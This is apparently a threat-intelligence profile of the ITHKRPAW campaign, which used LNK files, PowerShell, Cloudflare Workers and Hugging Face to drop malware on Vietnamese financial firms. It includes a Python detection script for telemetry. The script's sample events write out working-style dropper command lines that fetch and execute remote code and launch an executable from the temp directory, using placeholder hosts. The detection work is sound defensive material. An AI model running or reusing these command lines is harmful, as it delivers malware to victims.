ITHKRPAW
ITHKRPAW is a malware delivery campaign identified by Acronis TRU in January, targeting organizations in Vietnam, particularly the financial sector. The campaign used a malicious LNK file to invoke a Cloudflare Workers endpoint that served a PowerShell dropper. The dropper fetched its payload from a Hugging Face dataset repository, saved it as microsoft-update-assist.exe in the victim's temporary directory, and opened a benign cat image as a decoy to mask the activity; supporting reporting names the downloaded payload as omni-agent-v4.exe. Researchers assessed with moderate confidence that the PowerShell script was LLM-generated, based on the Vietnamese-language comments embedded in it. The activity was described in the context of broader abuse of trusted AI platforms, specifically Hugging Face, as staging and payload-hosting infrastructure for multi-stage malware infection chains. The source content provides no aliases or sub-groups beyond ITHKRPAW.
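The chain summarised above (LNK, then PowerShell, then a Workers-hosted dropper, then a Hugging Face-hosted executable written to the temp directory and launched beside a decoy) is most visible at the PowerShell stage, where process-creation telemetry captures the command line. The script below is an added example of that detection logic, not code from Acronis TRU or Mallory. It scores each event on several traits and only raises a finding when two or more coincide, because any single trait is common in legitimate activity. The events are constructed in Sysmon Event ID 1 shape, the hostnames are the public domains of the two platforms rather than IOCs from the report, the Worker hostname and the example-user/example-dataset repository path are placeholders, and only the two file names come from the reporting.

```python
import re
from urllib.parse import urlparse

# Hosting platforms abused in the chain described above. These are the public
# domains of the two services, not IOCs from the report; a Worker bound to a
# custom domain will not match here (see the note below the block).
STAGING_HOSTS = {
    "workers.dev": "cloudflare-workers",
    "huggingface.co": "huggingface",
}

URL_RE = re.compile(r'''https?://[^\s'"<>)]+''', re.IGNORECASE)
# Executable written under the user's temp directory (%TEMP%, $env:TEMP,
# or an expanded ...\AppData\Local\Temp\ path).
TEMP_EXE_RE = re.compile(r'''(?:%temp%|\$env:temp|\\appdata\\local\\temp\\)[^\s'"]*\.exe''', re.IGNORECASE)
# Cmdlets that execute fetched content or launch a file.
LAUNCH_RE = re.compile(r"\b(?:iex|invoke-expression|start-process|invoke-item)\b", re.IGNORECASE)


def _platform_for(url):
    """Map a URL to a staging platform name, or None if the host is not one."""
    host = (urlparse(url).hostname or "").lower()
    for suffix, name in STAGING_HOSTS.items():
        if host == suffix or host.endswith("." + suffix):
            return name
    return None


def score_event(event):
    """Return the list of suspicious traits found in one process-creation event."""
    cmd = event.get("CommandLine", "")
    reasons = []
    platforms = {p for p in map(_platform_for, URL_RE.findall(cmd)) if p}
    reasons.extend(f"download from {p}" for p in sorted(platforms))
    if TEMP_EXE_RE.search(cmd):
        reasons.append("writes .exe into user temp dir")
    if LAUNCH_RE.search(cmd):
        reasons.append("executes or launches fetched content")
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    if parent.endswith("\\explorer.exe") and "powershell" in image:
        reasons.append("powershell spawned by explorer (LNK double-click pattern)")
    return reasons


def analyze_events(events, min_reasons=2):
    """Return (index, reasons) for events showing at least min_reasons traits.

    One trait alone is too noisy: developers pull dataset files from Hugging
    Face and many legitimate scripts call Start-Process.
    """
    hits = []
    for i, event in enumerate(events):
        reasons = score_event(event)
        if len(reasons) >= min_reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample events (not real telemetry). The Worker hostname and the
# example-user/example-dataset path are placeholders.
SAMPLE_EVENTS = [
    {   # stage 1: LNK runs PowerShell, which pulls the dropper from a Worker
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -nop -w hidden -c "iex (iwr https://example-stage.workers.dev/ -UseBasicParsing).Content"',
    },
    {   # stage 2: dropper fetches the payload from Hugging Face, runs it, opens the decoy
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -c "iwr https://huggingface.co/datasets/example-user/example-dataset/resolve/main/omni-agent-v4.exe -OutFile $env:TEMP\microsoft-update-assist.exe; Start-Process $env:TEMP\microsoft-update-assist.exe; Invoke-Item $env:TEMP\cat.jpg"',
    },
    {   # benign: scheduled backup script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    },
    {   # benign: a developer downloading a dataset file into a project folder
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'powershell.exe -c "iwr https://huggingface.co/datasets/example-user/example-dataset/resolve/main/train.csv -OutFile C:\data\train.csv"',
    },
]

if __name__ == "__main__":
    for index, reasons in analyze_events(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

Run as-is, the script flags events 0 and 1 and passes the two benign events, the second of which hits the Hugging Face host alone and is correctly left below the threshold. Two caveats for production use: a Worker served from a custom domain will not match on hostname, so the parent-process and temp-write traits have to carry the detection there; and the stage-2 command line is only visible if the dropper spawns a new process, so the same traits should also be applied to PowerShell script block logging (Event ID 4104), where the downloaded dropper's body is recorded regardless.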
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Financials
Where they target
Geographies tied to known operations.
- 🇻🇳 Vietnam
Recent activity
2 sources tracked across advisories, community write-ups, and news.
Campaign abusing Hugging Face repositories as staging infrastructure to target Vietnamese financial organizations with a multi-stage infection chain.
Malware delivery campaign abusing Hugging Face repositories and Cloudflare Workers to stage and drop payloads disguised as benign files, including a fake update assistant, with targeting focused on financial-sector organizations and entities in Vietnam.